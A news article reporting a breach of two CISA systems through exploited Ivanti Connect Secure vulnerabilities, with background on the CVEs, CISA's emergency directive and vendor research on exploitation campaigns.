The US Cybersecurity and Infrastructure Agency (CISA) was hit by a cyberattack that exploited vulnerabilities in several Ivanti products, according to agency officials.
A CISA spokesperson said The record The breach occurred in February and affected two systems, which an anonymous source identified as the Infrastructure Protection (IP) Gateway and the Chemical Security Assessment Tool (CSAT).
IP Gateway is a web portal that supports the collection, analysis and distribution of sensitive information related to critical national infrastructure assets within the US.
Similarly, the CSAT refers to an online portal that hosts survey and application data submitted by chemical facilities deemed high risk under the Chemical Facility Anti-Terrorism Standards (CSATS).
The CSAT contains a significant amount of the country's most sensitive industrial information, such as Site Security Plans (SSP), Security Vulnerability Assessments (SVA), and the Top Screen system for reporting possession of chemicals of concern. (IOC).
The CISA spokesperson said the impact of the attack was limited to just two systems, which it took offline as soon as it became aware of the malicious activity, but declined to confirm or deny whether they were IP Gateway and CSAT.
CISA warned organizations about Ivanti risk, but failed to protect themselves
In January 2024, Ivanti disclosed the two vulnerabilities affecting all supported versions of its Connect Secure and Policy Secure products from 9.x to 22.x. Both flaws affected the web component of the Ivanti Connect Secure and Policy Secure products.
The first, CVE-2023-46805, is an authentication bypass vulnerability that could allow attackers to bypass control checks and was designated with a CVSS score of 8.2.
The second, CVE-2024-21887, is a command injection vulnerability that an attacker can use to remotely execute arbitrary commands on affected products, rated 9.2 in CVSS.
CISA issued an emergency directive on January 31 directing agencies running the affected products to disconnect all Connect Secure and Policy Secure instances from their network.
Agencies were also recommended to continue scanning for threats on any systems connected or recently connected to the affected product, isolate these systems as much as possible, and continue auditing privilege-level access accounts.
On February 29, CISA issued a warning that threat actors were actively exploiting these flaws and that, in combination, they could be used to launch sophisticated attacks.
“The vulnerabilities affect all supported versions and can be used in an exploit chain to allow malicious cyber threat actors to bypass authentication, create malicious requests, and execute arbitrary commands with elevated privileges.”
CISA encouraged organizations to assume that any user credentials and service accounts stored on the affected Ivanti VPN devices were likely compromised.
The agency also provided detection methods and indicators of compromise (IOC) to help organizations detect malicious activity on their networks.
Initial disclosure sparked a flurry of exploitation attempts
According to investigations, the affected products have been subject to a spate of attacks over the past month.
An analysis by cloud computing company Akamai found that since the initial disclosure of the vulnerability in January, Ivanti Connect Secure products were subject to more than 250,000 attacks each day.
Akamai stated that threat actors began seeking to exploit the vulnerability in mid-January, recording an increase in “widespread exploitation” of Connect Secure and Policy Secure products within 24 hours of their disclosure.
Most of the attacks were probes, according to Akamai, where threat actors attempt to deliver malicious payloads to send beacon requests to domains controlled by the attackers, paving the way for new PoCs for remote code execution (RCE) attacks.
Check Point published similar research describing a recent campaign exploiting the Ivanti Connect Secure VPN vulnerability by Magnet Goblin threat actors.
The campaign reportedly began a day after the patch was issued, seeking to capitalize on the flaw before organizations can protect their systems.
Check Point's analysis indicated that Magnet Globin used the vulnerability as an initial infection vector to deliver a new Linux version of the Nerbian malware family, specifically NerbianRAT, which they are known to use in their attacks.